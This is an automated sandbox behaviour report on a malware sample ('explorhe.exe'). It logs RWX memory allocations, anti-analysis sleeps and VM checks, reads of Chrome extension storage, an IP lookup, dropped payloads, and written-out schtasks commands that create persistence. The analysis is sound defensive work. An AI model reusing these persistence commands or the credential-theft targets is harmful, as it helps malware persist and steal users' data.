NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 147456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 475136 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9 a.m.	process_identifier: 1932 region_size: 114688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2708 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02db0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 region_size: 1708032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02660000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73423000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734c7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76af9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ac2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75602000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2760 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 region_size: 2494464 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73423000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734c7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76af9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ac2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75602000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

explorhe.exe tried to sleep 238 seconds, actually delayed analysis time by 238 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (23 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 26, 2024, 9:01 a.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceExW Jan. 26, 2024, 9:02 a.m.	total_number_of_free_bytes: 9863176192 free_bytes_available: 9863176192 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 26, 2024, 9:02 a.m.	total_number_of_free_bytes: 9916186624 free_bytes_available: 9916186624 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 26, 2024, 9:02 a.m.	total_number_of_free_bytes: 9999552512 free_bytes_available: 9999552512 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 26, 2024, 9:02 a.m.	total_number_of_free_bytes: 9999552512 free_bytes_available: 9999552512 root_path: C: total_number_of_bytes: 34252779520	1	1

Steals private information from local Internet browsers (50 out of 4033 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Sync Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (24 events)

file	C:\Users\test22\AppData\Local\Temp\1000609001\stan.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\Q2lP3WOPFRddpU6U21z0.exe
file	C:\Users\test22\AppData\Local\Temp\nsaD6BF.tmp\INetC.dll
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\txBA3rlC1VaXg6uHQQD1.exe
file	C:\Users\test22\AppData\Local\Temp\1000630001\fsdfsfsfs.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\1000640001\crypted.exe
file	C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file	C:\Users\test22\AppData\Local\Temp\1000631001\MRK.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\K5hUVnj3aMwtC3i_NpaY.exe
file	C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file	C:\Users\test22\AppData\Local\Temp\1000642001\alex.exe
file	C:\Users\test22\AppData\Roaming\Temp\Task.bat
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\1000636001\latestrocki.exe
file	C:\Users\test22\AppData\Local\Temp\1000643001\rdx1122.exe
file	C:\Users\test22\AppData\Local\Temp\1000639001\moto.exe
file	C:\Users\test22\AppData\Local\Temp\1000634001\Atqumy.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\EOhQhAkcbWTB_T1v1y_S.exe
file	C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file	C:\Users\test22\AppData\Local\Temp\1000641001\2024.exe
file	C:\Users\test22\AppData\Local\Temp\1000632001\sadsadsadsa.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\KUrJTQEsIHMvAcabBVxa.exe
file	C:\Users\test22\AppData\Local\Temp\1000629001\installs.exe

Creates a suspicious process (5 events)

cmdline	schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Drops a binary and executes it (18 events)

file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\KUrJTQEsIHMvAcabBVxa.exe
